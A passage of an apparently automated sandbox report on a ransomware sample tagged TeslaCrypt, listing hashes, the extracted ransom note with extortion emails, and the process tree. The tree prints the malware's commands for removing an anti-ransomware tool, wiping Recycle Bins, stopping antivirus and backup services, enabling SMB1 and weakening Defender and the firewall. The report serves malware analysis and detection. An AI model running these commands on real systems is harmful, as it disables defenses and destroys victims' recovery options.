teslacrypt | 8e775324fc69a677394cf6d079d1d45bf53af10acd683bda53e5f86a8a192393

Analysis

max time kernel
85s
max time network
76s
platform
windows7_x64
resource
win7v20201028
submitted
22-01-2021 08:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GZTJoxx.exe
Size

88KB
MD5

19f207b20b1d2a05aba1a1eb59da54d2
SHA1

8d75108ec34fd79f8336041d5ff31443cc527add
SHA256

8e775324fc69a677394cf6d079d1d45bf53af10acd683bda53e5f86a8a192393
SHA512

6a6b97e5f4543437270628af70a67e51a32d1ad9afbc0f19611d0131d9e84154f8525e3aeeb41c82f1c4437694be898b7ef520ac8eddf9b227f3d1013e57f749

Score

10^/10

teslacrypt discovery evasion ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

Don't worry, you can return all your files! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. We also downloaded your corporate files (databases, tables, accounting information, etc.) and we will have to publish them if you do not agree to cooperation. To get this software you need write on our e-mail: workplus111@protonmail.com Reserve e-mail address to contact us: worker400@airmail.cc Key Identifier: ZrtC2g8mLlxHion6LFaKfoGEHSl8cQJ+3Vha+GRXgl8i1/4rnOdVZ2K5FAKpBbqV2M2kpnU3ZLq5ftaQHeS3JqSWgjW+90CW8kp5HJqNRX8Aynm61r2k3heJTrsMfHJLIkzMafo1Xl9ppU4G+bu98wwxaivaUjDu8wxU9+a9glYie9sxA4sqjOr+enYPlzcEkj4LafgWpwvyeSq8EuSAd2xuyjnqQKmPiOfD6OQNXwf5inNaz6aw12TUAoGbcGvqJw5hsCKuRxkIs4h7xRZdDQiaE/2+f3a1A6kiAdWKRB38vnlt5un7Oezv8p5a7v4Hn1XGdx4DRtZxwn7VReRtVJXXVG6PIbW0o58nVohEu2BT0Bko5Ec7Zd0fM77FHJxfYf9rsT3DPlOGqIJnViQER/UqDuuBFZByituO1lDlVGs155owt8UVFV9oBIsybcz1eqjSY5X3BjGSZ0IHhtKXomKtvLEqaUd1M2FAqxaIo8E/XplQwfM96au5a3MNC55vIGzUfZyOY3UHKGN7YMBcI9dATfof/gv84BqXCj61f8NfUlZJ6Il8W36XKf1OHrVa5/7hmaqDvnEjpNSZSAq5dsLnRBgQsRYGyt+a8B/p/hgzyXO4kVh0cP13uczl0sPfl0zEgxut4XIzFELodGUkZl20d2qfUDON/m6XP9Vq/tY=

Emails

workplus111@protonmail.com

worker400@airmail.cc

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Ransom Note

Emails

workplus111@protonmail.com

worker400@airmail.cc

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
TeslaCrypt, AlphaCrypt
Ransomware based on CryptoLocker. Shut down by the developers in 2016.
ransomware teslacrypt
Executes dropped EXE 1 IoCs

Processes:

wqm58yk7.exe

pid process

1240 wqm58yk7.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

wqm58yk7.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\StartEnter.raw => C:\Users\Admin\Pictures\StartEnter.raw.0l0lqq	wqm58yk7.exe
File renamed	C:\Users\Admin\Pictures\MoveDisable.raw => C:\Users\Admin\Pictures\MoveDisable.raw.0l0lqq	wqm58yk7.exe

Drops startup file 1 IoCs

Processes:

wqm58yk7.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk wqm58yk7.exe
Loads dropped DLL 1 IoCs

Processes:

GZTJoxx.exe

pid process

1668 GZTJoxx.exe
Modifies file permissions 1 TTPs 3 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

3448 icacls.exe
3696 icacls.exe
4924 icacls.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	wqm58yk7.exe

pid	process
1668	GZTJoxx.exe

pid	process
3448	icacls.exe
3696	icacls.exe
4924	icacls.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

wqm58yk7.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	wqm58yk7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	wqm58yk7.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

2576 net.exe

pid	process
2576	net.exe

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
3052	taskkill.exe
5148	taskkill.exe
1524	taskkill.exe
1912	taskkill.exe
3536	taskkill.exe
1896	taskkill.exe
4748	taskkill.exe
2300	taskkill.exe
4704	taskkill.exe
3652	taskkill.exe
3188	taskkill.exe
3180	taskkill.exe
4972	taskkill.exe
3220	taskkill.exe
3144	taskkill.exe
2456	taskkill.exe
2472	taskkill.exe
3044	taskkill.exe
4744	taskkill.exe
1788	taskkill.exe
3684	taskkill.exe
2816	taskkill.exe
4804	taskkill.exe
4752	taskkill.exe
2652	taskkill.exe
4820	taskkill.exe
4832	taskkill.exe
4172	taskkill.exe
4496	taskkill.exe
3712	taskkill.exe
2764	taskkill.exe
4760	taskkill.exe
4936	taskkill.exe
5052	taskkill.exe
2996	taskkill.exe
3432	taskkill.exe
4796	taskkill.exe
4852	taskkill.exe
1980	taskkill.exe
1416	taskkill.exe
2360	taskkill.exe
2380	taskkill.exe
2784	taskkill.exe
4248	taskkill.exe
3744	taskkill.exe
1328	taskkill.exe
4448	taskkill.exe
1644	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1216 reg.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

4888 notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5284 PING.EXE

pid	process
1216	reg.exe

pid	process
4888	notepad.exe

pid	process
5284	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

wqm58yk7.exe

pid	process
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe
1240	wqm58yk7.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

Processes:

wqm58yk7.exepowershell.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1240	wqm58yk7.exe
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeDebugPrivilege	1896	taskkill.exe
Token: SeDebugPrivilege	2308	powershell.exe
Token: SeDebugPrivilege	2996	taskkill.exe
Token: SeDebugPrivilege	4448	taskkill.exe
Token: SeDebugPrivilege	1416	taskkill.exe
Token: SeDebugPrivilege	3180	taskkill.exe
Token: SeDebugPrivilege	4248	taskkill.exe
Token: SeDebugPrivilege	4496	taskkill.exe
Token: SeDebugPrivilege	4744	taskkill.exe
Token: SeDebugPrivilege	3052	taskkill.exe
Token: SeDebugPrivilege	4748	taskkill.exe
Token: SeDebugPrivilege	2784	taskkill.exe
Token: SeDebugPrivilege	3220	taskkill.exe
Token: SeDebugPrivilege	4752	taskkill.exe
Token: SeDebugPrivilege	2360	taskkill.exe
Token: SeDebugPrivilege	2380	taskkill.exe
Token: SeDebugPrivilege	4972	taskkill.exe
Token: SeDebugPrivilege	3712	taskkill.exe
Token: SeDebugPrivilege	3432	taskkill.exe
Token: SeDebugPrivilege	5148	taskkill.exe
Token: SeDebugPrivilege	1980	taskkill.exe
Token: SeDebugPrivilege	4172	taskkill.exe
Token: SeDebugPrivilege	3684	taskkill.exe
Token: SeDebugPrivilege	4704	taskkill.exe
Token: SeDebugPrivilege	3652	taskkill.exe
Token: SeDebugPrivilege	2816	taskkill.exe
Token: SeDebugPrivilege	4852	taskkill.exe
Token: SeDebugPrivilege	4804	taskkill.exe
Token: SeDebugPrivilege	3536	taskkill.exe
Token: SeDebugPrivilege	4760	taskkill.exe
Token: SeDebugPrivilege	2764	taskkill.exe
Token: SeDebugPrivilege	4820	taskkill.exe
Token: SeDebugPrivilege	3144	taskkill.exe
Token: SeDebugPrivilege	1328	taskkill.exe
Token: SeDebugPrivilege	2652	taskkill.exe
Token: SeDebugPrivilege	5116	powershell.exe
Token: SeDebugPrivilege	5052	taskkill.exe
Token: SeDebugPrivilege	1644	taskkill.exe
Token: SeDebugPrivilege	1912	taskkill.exe
Token: SeDebugPrivilege	2300	taskkill.exe
Token: SeDebugPrivilege	3044	taskkill.exe
Token: SeDebugPrivilege	1788	taskkill.exe
Token: SeDebugPrivilege	4936	taskkill.exe
Token: SeDebugPrivilege	4796	taskkill.exe
Token: SeDebugPrivilege	2472	taskkill.exe
Token: SeDebugPrivilege	4832	taskkill.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	3188	taskkill.exe
Token: SeDebugPrivilege	3744	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

wqm58yk7.exe

pid process

1240 wqm58yk7.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

wqm58yk7.exe

pid process

1240 wqm58yk7.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

GZTJoxx.exewqm58yk7.exe

description	pid	process	target process
PID 1668 wrote to memory of 1240	1668	GZTJoxx.exe	wqm58yk7.exe
PID 1668 wrote to memory of 1240	1668	GZTJoxx.exe	wqm58yk7.exe
PID 1668 wrote to memory of 1240	1668	GZTJoxx.exe	wqm58yk7.exe
PID 1668 wrote to memory of 1240	1668	GZTJoxx.exe	wqm58yk7.exe
PID 1240 wrote to memory of 1512	1240	wqm58yk7.exe	powershell.exe
PID 1240 wrote to memory of 1512	1240	wqm58yk7.exe	powershell.exe
PID 1240 wrote to memory of 1512	1240	wqm58yk7.exe	powershell.exe
PID 1240 wrote to memory of 1512	1240	wqm58yk7.exe	powershell.exe
PID 1240 wrote to memory of 1896	1240	wqm58yk7.exe	taskkill.exe
PID 1240 wrote to memory of 1896	1240	wqm58yk7.exe	taskkill.exe
PID 1240 wrote to memory of 1896	1240	wqm58yk7.exe	taskkill.exe
PID 1240 wrote to memory of 1896	1240	wqm58yk7.exe	taskkill.exe
PID 1240 wrote to memory of 1644	1240	wqm58yk7.exe	reg.exe
PID 1240 wrote to memory of 1644	1240	wqm58yk7.exe	reg.exe
PID 1240 wrote to memory of 1644	1240	wqm58yk7.exe	reg.exe
PID 1240 wrote to memory of 1644	1240	wqm58yk7.exe	reg.exe
PID 1240 wrote to memory of 1216	1240	wqm58yk7.exe	reg.exe
PID 1240 wrote to memory of 1216	1240	wqm58yk7.exe	reg.exe
PID 1240 wrote to memory of 1216	1240	wqm58yk7.exe	reg.exe
PID 1240 wrote to memory of 1216	1240	wqm58yk7.exe	reg.exe
PID 1240 wrote to memory of 1988	1240	wqm58yk7.exe	schtasks.exe
PID 1240 wrote to memory of 1988	1240	wqm58yk7.exe	schtasks.exe
PID 1240 wrote to memory of 1988	1240	wqm58yk7.exe	schtasks.exe
PID 1240 wrote to memory of 1988	1240	wqm58yk7.exe	schtasks.exe
PID 1240 wrote to memory of 1104	1240	wqm58yk7.exe	cmd.exe
PID 1240 wrote to memory of 1104	1240	wqm58yk7.exe	cmd.exe
PID 1240 wrote to memory of 1104	1240	wqm58yk7.exe	cmd.exe
PID 1240 wrote to memory of 1104	1240	wqm58yk7.exe	cmd.exe
PID 1240 wrote to memory of 992	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 992	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 992	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 992	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 272	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 272	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 272	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 272	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1020	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1020	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1020	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1020	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1176	1240	wqm58yk7.exe	cmd.exe
PID 1240 wrote to memory of 1176	1240	wqm58yk7.exe	cmd.exe
PID 1240 wrote to memory of 1176	1240	wqm58yk7.exe	cmd.exe
PID 1240 wrote to memory of 1176	1240	wqm58yk7.exe	cmd.exe
PID 1240 wrote to memory of 1416	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1416	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1416	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1416	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1900	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1900	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1900	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1900	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1088	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1088	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1088	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1088	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1164	1240	wqm58yk7.exe	netsh.exe
PID 1240 wrote to memory of 1164	1240	wqm58yk7.exe	netsh.exe
PID 1240 wrote to memory of 1164	1240	wqm58yk7.exe	netsh.exe
PID 1240 wrote to memory of 1164	1240	wqm58yk7.exe	netsh.exe
PID 1240 wrote to memory of 1224	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1224	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1224	1240	wqm58yk7.exe	sc.exe
PID 1240 wrote to memory of 1224	1240	wqm58yk7.exe	sc.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

wqm58yk7.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	wqm58yk7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	wqm58yk7.exe

C:\Users\Admin\AppData\Local\Temp\GZTJoxx.exe
"C:\Users\Admin\AppData\Local\Temp\GZTJoxx.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1668

C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe
"C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe"
2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops startup file
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1240

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1896

C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
3⤵
PID:1644

C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
3⤵
- Modifies registry key
PID:1216

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
3⤵
PID:1988

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
3⤵
PID:1104

C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
3⤵
PID:992

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
3⤵
PID:272

C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
3⤵
PID:1020

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
3⤵
PID:1176

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
3⤵
PID:1416

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
PID:1900

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
3⤵
PID:1088

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
3⤵
PID:1164

C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
3⤵
PID:1224

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
3⤵
PID:2028

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
3⤵
PID:928

C:\Windows\SysWOW64\net.exe
"net.exe" start Dnscache /y
3⤵
PID:364

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Dnscache /y
4⤵
PID:1332

C:\Windows\SysWOW64\net.exe
"net.exe" stop bedbg /y
3⤵
PID:340

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
4⤵
PID:2148

C:\Windows\SysWOW64\net.exe
"net.exe" start FDResPub /y
3⤵
PID:1964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start FDResPub /y
4⤵
PID:2116

C:\Windows\SysWOW64\net.exe
"net.exe" start SSDPSRV /y
3⤵
PID:1028

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
4⤵
PID:2092

C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
3⤵
PID:2044

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
4⤵
PID:2140

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQL_2008 /y
3⤵
PID:1760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
4⤵
PID:808

C:\Windows\SysWOW64\net.exe
"net.exe" start upnphost /y
3⤵
PID:436

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start upnphost /y
4⤵
PID:2172

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
3⤵
PID:1100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
4⤵
PID:2124

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
3⤵
PID:680

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
4⤵
PID:2128

C:\Windows\SysWOW64\net.exe
"net.exe" stop EhttpSrv /y
3⤵
PID:1776

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
4⤵
PID:2164

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccEvtMgr /y
3⤵
PID:972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
4⤵
PID:2156

C:\Windows\SysWOW64\net.exe
"net.exe" stop MMS /y
3⤵
PID:840

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
4⤵
PID:2100

C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
3⤵
PID:548

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
4⤵
PID:2108

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQLEXPRESS /y
3⤵
PID:2068

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
4⤵
PID:3876

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccSetMgr /y
3⤵
PID:2192

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
4⤵
PID:3324

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPSecurityService /y
3⤵
PID:2216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
4⤵
PID:3288

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
3⤵
PID:2240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
4⤵
PID:3100

C:\Windows\SysWOW64\net.exe
"net.exe" stop ekrn /y
3⤵
PID:2264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
4⤵
PID:3716

C:\Windows\SysWOW64\net.exe
"net.exe" stop SavRoam /y
3⤵
PID:2284

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
4⤵
PID:3740

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2308

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:2336

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
4⤵
PID:3672

C:\Windows\SysWOW64\net.exe
"net.exe" stop DefWatch /y
3⤵
PID:2368

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
4⤵
PID:3680

C:\Windows\SysWOW64\net.exe
"net.exe" stop RTVscan /y
3⤵
PID:2384

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
4⤵
PID:324

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net view
3⤵
PID:2420

C:\Windows\SysWOW64\net.exe
net view
4⤵
- Discovers systems in the same network
PID:2576

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPS /y
3⤵
PID:2460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
4⤵
PID:3800

C:\Windows\SysWOW64\net.exe
"net.exe" stop mozyprobackup /y
3⤵
PID:2492

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
4⤵
PID:3752

C:\Windows\SysWOW64\net.exe
"net.exe" stop VSNAPVSS /y
3⤵
PID:2508

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
4⤵
PID:1960

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBFCService /y
3⤵
PID:2548

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
4⤵
PID:3772

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
3⤵
PID:2616

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
4⤵
PID:1756

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPUpdateService /y
3⤵
PID:2592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
4⤵
PID:3240

C:\Windows\SysWOW64\net.exe
"net.exe" stop ntrtscan /y
3⤵
PID:2660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
4⤵
PID:3264

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPSAMA /y
3⤵
PID:2696

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
4⤵
PID:4872

C:\Windows\SysWOW64\net.exe
"net.exe" stop EsgShKernel /y
3⤵
PID:2728

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
4⤵
PID:4856

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
3⤵
PID:2760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
4⤵
PID:4848

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:2788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
4⤵
PID:4880

C:\Windows\SysWOW64\net.exe
"net.exe" stop ESHASRV /y
3⤵
PID:2836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
4⤵
PID:3916

C:\Windows\SysWOW64\net.exe
"net.exe" stop SDRSVC /y
3⤵
PID:2848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
4⤵
PID:3884

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2012 /y
3⤵
PID:2868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
4⤵
PID:3892

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBIDPService /y
3⤵
PID:2912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
4⤵
PID:3964

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
3⤵
PID:2896

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
4⤵
PID:3900

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SYSTEM_BGC /y
3⤵
PID:2924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
4⤵
PID:4016

C:\Windows\SysWOW64\net.exe
"net.exe" stop FA_Scheduler /y
3⤵
PID:2932

C:\Windows\SysWOW64\net1.exe
